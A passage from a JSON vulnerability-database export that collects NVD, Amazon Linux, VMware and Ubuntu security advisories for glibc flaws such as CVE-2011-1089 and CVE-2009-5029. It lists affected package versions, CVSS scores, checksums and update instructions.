"http://openwall.com/lists/oss-security/2011/03/15/6", "http://openwall.com/lists/oss-security/2011/03/05/7", "http://openwall.com/lists/oss-security/2011/03/31/4", "http://openwall.com/lists/oss-security/2011/04/01/2", "http://openwall.com/lists/oss-security/2011/03/04/12", "http://openwall.com/lists/oss-security/2011/03/04/9", "http://openwall.com/lists/oss-security/2011/03/04/11", "http://www.mandriva.com/security/advisories?name=MDVSA-2011:178", "http://openwall.com/lists/oss-security/2011/03/14/7", "http://www.securityfocus.com/bid/46740", "http://www.redhat.com/support/errata/RHSA-2011-1526.html", "http://openwall.com/lists/oss-security/2011/03/22/4", "http://openwall.com/lists/oss-security/2011/03/31/3", "http://openwall.com/lists/oss-security/2011/03/07/9", "http://www.mandriva.com/security/advisories?name=MDVSA-2011:179", "http://openwall.com/lists/oss-security/2011/03/22/6", "http://openwall.com/lists/oss-security/2011/03/14/5", "http://openwall.com/lists/oss-security/2011/03/04/10", "http://openwall.com/lists/oss-security/2011/03/14/16"], "description": "The addmntent function in the GNU C Library (aka glibc or libc6) 2.13 and earlier does not report an error status for failed attempts to write to the /etc/mtab file, which makes it easier for local users to trigger corruption of this file, as demonstrated by writes from a process with a small RLIMIT_FSIZE value, a different vulnerability than CVE-2010-0296.", "edition": 2, "reporter": "NVD", "published": "2011-04-09T22:55:01", "title": "CVE-2011-1089", "type": "cve", "enchantments": {"score": {"modified": "2017-04-18T15:52:56", "vector": "NONE", "value": 2.1}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-1089"], "scanner": [], "modified": "2016-12-07T13:15:43", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.12.1", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.12.0", "cpe:/a:gnu:glibc:2.12.2", "cpe:/a:gnu:glibc:1.09.1", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.11.3", "cpe:/a:gnu:glibc:1.05", "cpe:/a:gnu:glibc:1.02", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:1.08", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:1.07", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.10.2", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:1.09", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:1.01", "cpe:/a:gnu:glibc:1.00", "cpe:/a:gnu:glibc:1.03", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:1.06", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.11.2", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:1.04", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.3.10", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2011-1089", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1089", "cvss": {"score": 3.3, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:11", "references": ["https://rhn.redhat.com/errata/RHSA-2012-0058.html"], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "glibc-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "glibc-debuginfo-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "glibc-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "glibc-static-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "glibc-static", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "glibc-debuginfo-common-2.12-1.47.32.amzn1.i686.rpm", "packageName": "glibc-debuginfo-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "glibc-devel-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "glibc-common-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "glibc-utils-2.12-1.47.32.amzn1.i686.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "glibc-headers-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "glibc-2.12-1.47.32.amzn1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "src", "packageFilename": "glibc-2.12-1.47.32.amzn1.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "glibc-devel-2.12-1.47.32.amzn1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "glibc-headers-2.12-1.47.32.amzn1.i686.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "glibc-common-2.12-1.47.32.amzn1.i686.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "glibc-debuginfo-2.12-1.47.32.amzn1.i686.rpm", "packageName": "glibc-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "nscd-2.12-1.47.32.amzn1.i686.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "i686", "packageFilename": "glibc-static-2.12-1.47.32.amzn1.i686.rpm", "packageName": "glibc-static", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "glibc-utils-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "nscd-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.12-1.47.32.amzn1", "arch": "x86_64", "packageFilename": "glibc-debuginfo-common-2.12-1.47.32.amzn1.x86_64.rpm", "packageName": "glibc-debuginfo-common", "operator": "lt"}], "description": "**Issue Overview:**\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. ([CVE-2009-5029 __](<https://access.redhat.com/security/cve/CVE-2009-5029>))\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. ([CVE-2011-4609 __](<https://access.redhat.com/security/cve/CVE-2011-4609>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-debuginfo-common-2.12-1.47.32.amzn1.i686 \n glibc-common-2.12-1.47.32.amzn1.i686 \n glibc-debuginfo-2.12-1.47.32.amzn1.i686 \n glibc-devel-2.12-1.47.32.amzn1.i686 \n glibc-2.12-1.47.32.amzn1.i686 \n glibc-utils-2.12-1.47.32.amzn1.i686 \n nscd-2.12-1.47.32.amzn1.i686 \n glibc-headers-2.12-1.47.32.amzn1.i686 \n glibc-static-2.12-1.47.32.amzn1.i686 \n \n src: \n glibc-2.12-1.47.32.amzn1.src \n \n x86_64: \n glibc-devel-2.12-1.47.32.amzn1.x86_64 \n glibc-static-2.12-1.47.32.amzn1.x86_64 \n glibc-debuginfo-common-2.12-1.47.32.amzn1.x86_64 \n glibc-utils-2.12-1.47.32.amzn1.x86_64 \n glibc-common-2.12-1.47.32.amzn1.x86_64 \n glibc-headers-2.12-1.47.32.amzn1.x86_64 \n glibc-2.12-1.47.32.amzn1.x86_64 \n glibc-debuginfo-2.12-1.47.32.amzn1.x86_64 \n nscd-2.12-1.47.32.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2014-09-14T15:14:00", "title": "Medium: glibc", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:11", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "modified": "2014-09-14T15:14:00", "id": "ALAS-2012-039", "href": "https://alas.aws.amazon.com/ALAS-2012-39.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2012-0018\r\nSynopsis: VMware security updates for vCSA and ESXi\r\nIssue date: 2012-12-20\r\nUpdated on: 2012-12-20 &#40;initial advisory&#41;\r\nCVE numbers: ------------- vCSA ---------------\r\n CVE-2012-6324, CVE-2012-6325\r\n ------------- glibc --------------\r\n CVE-2009-5029, CVE-2009-5064, CVE-2010-0830,\r\n CVE-2011-1089, CVE-2011-4609, CVE-2012-0864,\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406,\r\n CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware has updated vCenter Server Appliance &#40;vCSA&#41; and ESX to \r\n address multiple security vulnerabilities\r\n\r\n2. Relevant releases\r\n\r\n vCenter Server Appliance 5.1 without Patch 1\r\n vCenter Server Appliance 5.0 without Update 2\r\n\r\n VMware ESXi 5.1 without patch ESXi510-201212101\r\n VMware ESXi 5.0 without patch ESXi500-201212101\r\n\r\n3. Problem Description\r\n\r\n a. vCenter Server Appliance directory traversal\r\n\r\n The vCenter Server Appliance &#40;vCSA&#41; contains a directory\r\n traversal vulnerability that allows an authenticated \r\n remote user to retrieve arbitrary files. Exploitation of\r\n this issue may expose sensitive information stored on the \r\n server. \r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n has assigned the name CVE-2012-6324 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux vCSA 5.1 Patch 1\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\n b. vCenter Server Appliance arbitrary file download\r\n\r\n The vCenter Server Appliance &#40;vCSA&#41; contains an XML parsing \r\n vulnerability that allows an authenticated remote user to\r\n retrieve arbitrary files. Exploitation of this issue may\r\n expose sensitive information stored on the server.\r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n has assigned the name CVE-2012-6325 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux not affected\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\nc. Update to ESX glibc package\r\n\r\n The ESX glibc package is updated to version glibc-2.5-81.el5_8.1\r\n to resolve multiple security issues.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n has assigned the names CVE-2009-5029, CVE-2009-5064,\r\n CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, CVE-2012-0864\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406 and CVE-2012-3480\r\n to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n ESXi 5.1 ESXi ESXi510-201212101\r\n ESXi 5.0 ESXi ESXi500-201212101\r\n ESXi 4.1 ESXi no patch planned\r\n ESXi 4.0 ESXi no patch planned\r\n ESXi 3.5 ESXi not applicable\r\n\r\n ESX any ESX not applicable\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and\r\n version and verify the checksum of your downloaded file.\r\n\r\n\r\n ESXi and ESX\r\n ------------\r\n The download for ESXi includes vCenter Server Appliance.\r\n\r\n\r\n https://downloads.vmware.com/go/selfsupport-download\r\n\r\n ESXi 5.1\r\n http://kb.vmware.com/kb/2035775\r\n\r\n ESXi 5.0\r\n http://kb.vmware.com/kb/2033751\r\n\r\n5. References\r\n\r\n ------------- vCSA ---------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6324\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6325\r\n ------------- glibc --------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5064\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0830\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1089\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4609\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0864\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3404\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3405\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3406\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n6. Change log\r\n\r\n 2012-12-20 VMSA-2012-0018\r\n Initial security advisory in conjunction with the release of\r\n vSphere 5.1 Patch 1 and vSphere 5.0 Update 2 on 2012-12-20.\r\n\r\n- --------------------------------------------------------------------\r\n\r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware security response policy\r\n http://www.vmware.com/support/policies/security_response.html\r\n\r\n General support life cycle policy\r\n http://www.vmware.com/support/policies/eos.html\r\n\r\n VMware Infrastructure support life cycle policy\r\n http://www.vmware.com/support/policies/eos_vi.html\r\n\r\n Copyright 2012 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 &#40;Build 2599&#41;\r\nCharset: utf-8\r\n\r\nwj8DBQFQ01bsDEcm8Vbi9kMRAkXEAJoClYysvoV67RKiZ0uN1YszPcN0LQCg8QMV\r\nOWjpV7Bnt27472i5EOhk9fI=\r\n=jrDP\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2013-01-02T00:00:00", "title": "VMSA-2012-0018 VMware security updates for vCSA and ESXi", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2013-01-02T00:00:00", "id": "SECURITYVULNS:DOC:28907", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28907", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "references": [], "description": "==========================================================================\r\nUbuntu Security Notice USN-1396-1\r\nMarch 09, 2012\r\n\r\neglibc, glibc vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nMultiple vulnerabilities were discovered and fixed in the GNU C Library.\r\n\r\nSoftware Description:\r\n- eglibc: Embedded GNU C Library: sources\r\n- glibc: GNU C Library: Documentation\r\n\r\nDetails:\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\ninteger overflows in the timezone handling code. An attacker could use\r\nthis to possibly execute arbitrary code by convincing an application\r\nto load a maliciously constructed tzfile. &#40;CVE-2009-5029&#41;\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\npasswd.adjunct.byname map entries in the Network Information Service\r\n&#40;NIS&#41; code in the name service caching daemon &#40;nscd&#41;. An attacker\r\ncould use this to obtain the encrypted passwords of NIS accounts.\r\nThis issue only affected Ubuntu 8.04 LTS. &#40;CVE-2010-0015&#41;\r\n\r\nChris Evans reported that the GNU C Library did not properly\r\ncalculate the amount of memory to allocate in the fnmatch&#40;&#41; code. An\r\nattacker could use this to cause a denial of service or possibly\r\nexecute arbitrary code via a maliciously crafted UTF-8 string.\r\nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. &#40;CVE-2011-1071&#41;\r\n\r\nTomas Hoger reported that an additional integer overflow was possible\r\nin the GNU C Library fnmatch&#40;&#41; code. An attacker could use this to\r\ncause a denial of service via a maliciously crafted UTF-8 string. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\r\nand Ubuntu 11.04. &#40;CVE-2011-1659&#41;\r\n\r\nDan Rosenberg discovered that the addmntent&#40;&#41; function in the GNU C\r\nLibrary did not report an error status for failed attempts to write to\r\nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab,\r\npossibly causing a denial of service or otherwise manipulate mount\r\noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS,\r\nUbuntu 10.10 and Ubuntu 11.04. &#40;CVE-2011-1089&#41;\r\n\r\nHarald van Dijk discovered that the locale program included with the\r\nGNU C library did not properly quote its output. This could allow a\r\nlocal attacker to possibly execute arbitrary code using a crafted\r\nlocalization string that was evaluated in a shell script. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. &#40;CVE-2011-1095&#41;\r\n\r\nIt was discovered that the GNU C library loader expanded the\r\n$ORIGIN dynamic string token when RPATH is composed entirely of this\r\ntoken. This could allow an attacker to gain privilege via a setuid\r\nprogram that had this RPATH value. &#40;CVE-2011-1658&#41;\r\n\r\nIt was discovered that the GNU C library implementation of memcpy\r\noptimized for Supplemental Streaming SIMD Extensions 3 &#40;SSSE3&#41;\r\ncontained a possible integer overflow. An attacker could use this to\r\ncause a denial of service or possibly execute arbitrary code. This\r\nissue only affected Ubuntu 10.04 LTS. &#40;CVE-2011-2702&#41;\r\n\r\nJohn Zimmerman discovered that the Remote Procedure Call &#40;RPC&#41;\r\nimplementation in the GNU C Library did not properly handle large\r\nnumbers of connections. This could allow a remote attacker to cause\r\na denial of service. &#40;CVE-2011-4609&#41;\r\n\r\nIt was discovered that the GNU C Library vfprintf&#40;&#41; implementation\r\ncontained a possible integer overflow in the format string protection\r\ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in\r\nconjunction with a format string vulnerability to bypass the format\r\nstring protection and possibly execute arbitrary code. &#40;CVE-2012-0864&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libc6 2.13-20ubuntu5.1\r\n\r\nUbuntu 11.04:\r\n libc6 2.13-0ubuntu13.1\r\n\r\nUbuntu 10.10:\r\n libc-bin 2.12.1-0ubuntu10.4\r\n libc6 2.12.1-0ubuntu10.4\r\n\r\nUbuntu 10.04 LTS:\r\n libc-bin 2.11.1-0ubuntu7.10\r\n libc6 2.11.1-0ubuntu7.10\r\n\r\nUbuntu 8.04 LTS:\r\n libc6 2.7-10ubuntu8.1\r\n\r\nAfter a standard system update you need to restart all services or\r\nreboot your computer to make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1396-1\r\n CVE-2009-5029, CVE-2010-0015, CVE-2011-1071, CVE-2011-1089,\r\n CVE-2011-1095, CVE-2011-1658, CVE-2011-1659, CVE-2011-2702,\r\n CVE-2011-4609, CVE-2012-0864\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-20ubuntu5.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-0ubuntu13.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.12.1-0ubuntu10.4\r\n https://launchpad.net/ubuntu/+source/eglibc/2.11.1-0ubuntu7.10\r\n https://launchpad.net/ubuntu/+source/glibc/2.7-10ubuntu8.1\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2012-03-10T00:00:00", "title": "[USN-1396-1] GNU C Library vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:44", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "modified": "2012-03-10T00:00:00", "id": "SECURITYVULNS:DOC:27743", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27743", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:36", "references": ["https://vulners.com/securityvulns/securityvulns:doc:23941"], "description": "Invalid mntent functions string processing, ELF format parsing memory corruption.", "edition": 1, "reporter": "BUGTRAQ", "published": "2010-05-27T00:00:00", "title": "GNU glibc library security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:36", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "glibc", "version": "2.11", "operator": "eq"}], "cvelist": ["CVE-2010-0296", "CVE-2010-0830"], "modified": "2010-05-27T00:00:00", "id": "SECURITYVULNS:VULN:10874", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10874", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:46", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27743"], "description": "memcpy&#40;&#41; integer overflow, RPC DoS, vfprintf&#40;&#41; integer overflow.", "edition": 1, "reporter": "BUGTRAQ", "published": "2012-03-10T00:00:00", "title": "glibc multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:46", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "glibc", "version": "2.13", "operator": "eq"}], "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2011-2702"], "modified": "2012-03-10T00:00:00", "id": "SECURITYVULNS:VULN:12241", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12241", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:34", "references": [], "description": "===========================================================\r\nUbuntu Security Notice USN-944-1 May 25, 2010\r\nglibc, eglibc vulnerabilities\r\nCVE-2008-1391, CVE-2010-0296, CVE-2010-0830\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 9.04\r\nUbuntu 9.10\r\nUbuntu 10.04 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n libc6 2.3.6-0ubuntu20.6\r\n\r\nUbuntu 8.04 LTS:\r\n libc6 2.7-10ubuntu6\r\n\r\nUbuntu 9.04:\r\n libc6 2.9-4ubuntu6.2\r\n\r\nUbuntu 9.10:\r\n libc6 2.10.1-0ubuntu17\r\n\r\nUbuntu 10.04 LTS:\r\n libc6 2.11.1-0ubuntu7.1\r\n\r\nAfter a standard system update you need to restart all services to make\r\nthe necessary changes.\r\n\r\nDetails follow:\r\n\r\nMaksymilian Arciemowicz discovered that the GNU C library did not\r\ncorrectly handle integer overflows in the strfmon function. If a user\r\nor automated system were tricked into processing a specially crafted\r\nformat string, a remote attacker could crash applications, leading to\r\na denial of service. &#40;Ubuntu 10.04 was not affected.&#41; &#40;CVE-2008-1391&#41;\r\n\r\nJeff Layton and Dan Rosenberg discovered that the GNU C library did not\r\ncorrectly handle newlines in the mntent family of functions. If a local\r\nattacker were able to inject newlines into a mount entry through other\r\nvulnerable mount helpers, they could disrupt the system or possibly gain\r\nroot privileges. &#40;CVE-2010-0296&#41;\r\n\r\nDan Rosenberg discovered that the GNU C library did not correctly validate\r\ncertain ELF program headers. If a user or automated system were tricked\r\ninto verifying a specially crafted ELF program, a remote attacker could\r\nexecute arbitrary code with user privileges. &#40;CVE-2010-0830&#41;\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.6-0ubuntu20.6.diff.gz\r\n Size/MD5: 572994 a6a01bf279888c3d2b14dee810d96630\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.6-0ubuntu20.6.dsc\r\n Size/MD5: 1979 fe2822fd0469e46f34783b1f9c7e5380\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.6.orig.tar.gz\r\n Size/MD5: 13891563 c50d207d67b330a4515321cbac3776f8\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc-doc_2.3.6-0ubuntu20.6_all.deb\r\n Size/MD5: 3355172 e815a0572d0679a20eb1820977993dc8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/zoneinfo-udeb_2.3.6-0ubuntu20.6_all.udeb\r\n Size/MD5: 11142 1e3d6fdf2926492042d626bc1c9f2680\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T 